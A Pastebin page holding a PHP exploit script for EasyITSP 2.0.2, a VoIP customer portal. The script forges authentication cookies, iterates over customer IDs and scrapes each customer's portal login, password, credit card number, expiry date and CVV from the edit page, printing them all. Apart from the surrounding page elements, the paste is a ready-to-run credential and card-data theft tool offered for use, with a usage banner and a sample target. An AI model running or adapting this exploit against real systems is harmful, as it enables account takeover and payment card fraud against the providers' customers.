API tools faq
paste
Guest User

Exploit EasyITSP by Michal Blaszczak-blaszczakm.blogspot.com

a guest
Oct 26th, 2012
179
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.69 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. $arguments = getopt("a:b:c:");
  4. $url = $arguments['a'];
  5. $id_pod =$arguments['b'];
  6. $id_end =$arguments['c'];
  7. if(count($arguments)!=3)
  8. {
  9. echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2   '."\n";
  10. echo '## Discovery users with passwords              '."\n";
  11. echo '##                             '."\n";
  12. echo '## Author: Michal Blaszczak                '."\n";
  13. echo '## Website: blaszczakm.blogspot.com                '."\n";
  14. echo '## Date: 10.10.2012                   '."\n";
  15. echo '##                             '."\n";
  16. echo '## Greatz: cond, packet, jestemka1pi, sid, chez            '."\n";
  17. echo '##         #pakamera@freenode                 '."\n";
  18. echo '##         (old) #2600@ircnet                 '."\n";
  19. echo '##         (old) #mamo_mamo_jestem_chakerem@ircnet    '."\n";
  20. echo '##                            '."\n";
  21. echo '## Usage:                         '."\n";
  22. echo '## php exploit.php -a URL -b ID_START -c ID_STOP      '."\n";
  23. echo '##                            '."\n";
  24. echo '## Example:                       '."\n";
  25. echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b 5 -c 10'."\n";
  26.  
  27. exit;
  28. }
  29. $url2='customers_edit.php?currentpage=customers';
  30. $url.=$url2;
  31. for ($id_pod; $id_pod <= $id_end; $id_pod++) {
  32. $cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' . urlencode($id_pod);
  33. $ch = curl_init($url);
  34. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  35. curl_setopt($ch, CURLOPT_HEADER, 1);
  36. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  37. curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metodą post
  38. curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania
  39. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  40. $intro = curl_exec($ch);
  41. curl_close($ch);
  42.  
  43. $regex_login = '#\<td title="Customer username for portal"\>(.+?)\<\/td\>#s';
  44. preg_match($regex_login, $intro, $login);
  45.  
  46. $regex_pass = '#\<td title="Customer password for portal"><input type="password" name="password" required="1" maxlength="45" value="(.+?)"\>\<\/td\>#s';
  47. preg_match($regex_pass, $intro, $pass);
  48.  
  49. $regex_ccnum = '#\<td title="Customer cc number"><input type="text" name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
  50. preg_match($regex_ccnum, $intro, $ccnum);
  51.  
  52. $regex_ccexpire = '#\<td title="Customer cc expire"><input type="text" name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
  53. preg_match($regex_ccexpire, $intro, $ccexpire);
  54.  
  55. $regex_cccvv = '#\<td title="Customer credit card CVV"><input type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
  56. preg_match($regex_cccvv, $intro, $cccvv);
  57.  
  58.  
  59.     $test = explode(" ",$login[1]);
  60.  
  61.  
  62.     if(trim($test[0])!='</td>')
  63.     {
  64.     echo 'ID:'.$id_pod."\n";
  65.     echo 'LOGIN:'.$login[1]."\n";
  66.     echo 'Password:'.$pass[1]."\n";
  67.     echo 'CCnumber:'.$ccnum[1]."\n";
  68.     echo 'CCexpire:'.$ccexpire[1]."\n";
  69.     echo 'CCCVV:'.$cccvv[1]."\n\n";
  70.     }
  71. }
  72.  
  73. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!